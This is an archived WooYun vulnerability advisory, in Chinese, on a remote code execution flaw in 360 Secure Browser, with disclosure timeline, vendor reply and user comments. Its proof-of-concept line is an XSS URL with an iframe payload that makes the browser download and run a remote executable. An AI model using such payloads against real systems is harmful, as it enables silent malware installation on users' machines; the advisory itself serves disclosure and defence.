360安全浏览器远程代码执行漏洞

漏洞概要

缺陷编号:WooYun-2010-020

漏洞标题:360安全浏览器远程代码执行漏洞

相关厂商:奇虎360

漏洞作者:结界师

提交时间:2010-07-15 12:24

公开时间:2010-08-18 16:37

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2010-07-15: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-18: 细节向公众公开

简要描述:

360安全浏览器(360SE)是互联网上好用、安全的新一代浏览器,和360安全卫士、360杀毒等软件等产品一同成为360安全中心的系列产品,官方网站在http://se.360.cn。
在360浏览器中存在一个设计上的问题,结合一些其他的漏洞可能导致远程代码执行。

详细说明:

360浏览器为了扩展自己的功能,在内部实现了一系列的扩展接口,并且通过web可以调用这些接口,但是在跨越安全边界时唯一的检查就是调用的来源,必须为**.**.**.**才可以调用这些接口。通过在**.**.**.**网站中漏洞的查找,通过一个xss可以跨越这个边界,从而直接调用这些接口。某些接口如插件支持上可以下载远程的可执行程序直接执行,同时执行的时候并没有对来源应用程序做签名等认证,导致可以直接下载恶意程序执行。

漏洞证明:

http://**.**.**.**/v3/guide/guide_start.htm?ver=**.**.**.**&firstcheck=1&1="><iframe name="fuck" src="http://**.**.**.**/v3/plugins.htm" onload=alert(fuck.window.eval("Install('ExtWebMail','**.**.**.**3','360邮件通','http://**.**.**.**/ExtWebmail.zip','**.**.**.**')"))></iframe>其中ExtWebmail.zip里自定义的ExtWebmail.exe将会被执行

修复方案:

1 修复xss(无法解决**.**.**.**的其他安全问题)2 验证程序的来源(无法解决其他接口的问题)

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:17

确认时间:2010-07-15 12:24

厂商回复:

该漏洞已经修复,感谢wooyun对360浏览器的支持。由于该漏洞需在特定场景下才能被利用,因此危害等级为:中

最新状态:

暂无

评价

  1. 2010-01-01 00:00 saga 白帽子 | Rank:11 漏洞数:2)

    剑心的洞就是有质量,单独一处se.360边界检查XSS不足以发,一定要找出更具有价值的利用方式

  2. 2010-01-01 00:00 gainover 白帽子 | Rank:1331 漏洞数:97)

    厉害~ 学习了!

  3. 2010-01-01 00:00 imlonghao 白帽子 | Rank:703 漏洞数:73)

    @xsser 日期亮了

  4. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @imlonghao 亲,bug,忽略吧

  5. 2010-01-01 00:00 leehenwu 白帽子 | Rank:194 漏洞数:24)

    不错~

  6. 2010-01-01 00:00 FallenAngel 白帽子 | Rank:0 漏洞数:0)

    @xsser 1970年 时光逆转了 你的洞含金量很高啊!!赞!

  7. 2010-01-01 00:00 爹 白帽子 | Rank:17 漏洞数:3)

    赞赞赞

  8. 2010-01-01 00:00 lxsec 白帽子 | Rank:52 漏洞数:6)

    @saga 结界师是剑心?

  9. 2010-01-01 00:00 lxsec 白帽子 | Rank:52 漏洞数:6)

    数据库有问题?
    怎么显示1970

  10. 2010-01-01 00:00 dotey 白帽子 | Rank:5 漏洞数:3)

    不错,挺有技术含量。

  11. 2010-01-01 00:00 Stranger 白帽子 | Rank:0 漏洞数:0)

    不愧是创世人之一( ⊙ o ⊙ )啊!

  12. 2010-01-01 00:00 he1renyagao 白帽子 | Rank:224 漏洞数:28)

    mark

  13. 2010-01-01 00:00 abaddon 白帽子 | Rank:32 漏洞数:4)

    结界师报告的质量果然值得学习
    有种前来朝拜的感觉

  14. 2010-01-01 00:00 乐乐、 白帽子 | Rank:528 漏洞数:57)

    跳转回来看大牛的

  15. 2010-01-01 00:00 saga 白帽子 | Rank:11 漏洞数:2)

    @lxsec 不是吗 难道我一直误认为是?sorry

  16. 2010-01-01 00:00 白加黑 白帽子 | Rank:17 漏洞数:5)

    浏览器漏洞,高端

  17. 2010-01-01 00:00 小杨 白帽子 | Rank:21 漏洞数:3)

    2010-07-15: 细节已通知厂商并且等待厂商处理中
    1970-01-01: 厂商已经确认,细节仅向厂商公开
    1970-01-04: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航)
    1970-02-25: 细节向核心白帽子及相关领域专家公开
    1970-03-07: 细节向普通白帽子公开
    1970-03-17: 细节向实习白帽子公开
    2010-08-18: 细节向公众公开